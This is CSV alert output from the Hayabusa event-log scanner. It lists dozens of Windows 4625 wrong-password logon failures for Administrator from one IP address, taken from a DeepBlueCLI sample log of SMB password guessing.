NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cMpitnzLXDLSXL73 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RSfaPdcsiRQoGYYm | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PJRP4bS9Qgg06Z5P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3Z4veMNKngHUDoRf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmF0YFgAMSRotb1y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DmrbO3dZw46DgmZQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qg4CMwLpfzLrvDPj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.850 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BKDKUXNNhuSqRiTE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cBocrjNXjmuPCKRJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: loCrAXibgVxcOtCM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZ7pHOJeOExrON2E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MeucKpaodpmdsqhD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LRlmBeBlV6n4MQyo | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E8FYOF6HxJHqm7GW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9tBtz1GYn5J8sbFH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qn8PlxEzIu9AKUgt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdjqlNDU3U150UAw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esaTfuwuiFAkIVs6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.280 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y4LbVQ5ytgVCqFmL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rWoX76sgYTVwxkD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQFJRRYn6sjYK5cD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wyVuBGEFGJqImQ7W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pRvnyVGxG8i0e3PQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X6Hv2fj43a8j1O2P | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: myP4zVFyw2qE1SV7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lpmBcVilH72dYF7E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jd9hKGDxLcnZphlL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OmXgOD9kaGJ4PIA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BpQtWW0fAEzNH28B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.768 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EgNkY8LKSWcnLM00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8S1dUwb3HjOnEs9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 49ZKcnswdISJDwbS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qOuYmww71pTM0l3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PUHoGgmXKRJknRZG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6yf8LSkcwBP9s1mN | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmH2AMDmkZVbCt8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I23o9EQLpPpn9RlY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MrEVj3DB1prpOtnq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Iau1IHKxWRsqQaG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NdPC9LVhZS2l27XF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.256 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxcofRpjCFme3mg2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e1VnQLbETh1GgX0c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rbdPYXx8mx4SV9G7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hcv3HWid3auIu7cY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o2OviUvdOmk5HON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bVBSORhgFwTy2TWO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DsIhCEZcfYenufvf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xDadVFtE4toNiagy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GnydJjDBdzJWqmWa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GW8im2IhNzrGoSFs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aTzlqq9HLEX6wzdU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gz98aGXd0fdVzmTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q2zOy64cp6dXelNl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X1BflxNjQRNopjb4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 401ulFeuzCtp5lPF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p0SIzJrzkseFB1j8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cyQMxtEdbud8iJLI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7gbjIqxD4E6fYsGx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rEeZEcj63sBddCsK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tiATfqYtrH9LoqR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PG3HB3GqFwQFLdcq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G8NU6WRdrq9DxM6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cvZKIkI2aeBzbwe0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EE7AL3nJ7qsnk4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feu34D0VvoMrnWzo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mrNRIpCpmAV3npax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zpxgEvvoC0stFdTl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XvpDKRAPDS36sqNL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4cqJKEIySxiQdCRD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pm1F7QEwBE054ui0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RvIjhyfdlXiX72Es | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dJilW4KgIEeh5VNr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Ka0FYYdVOj90l0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B9ZjGE8T6RuGx8SZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
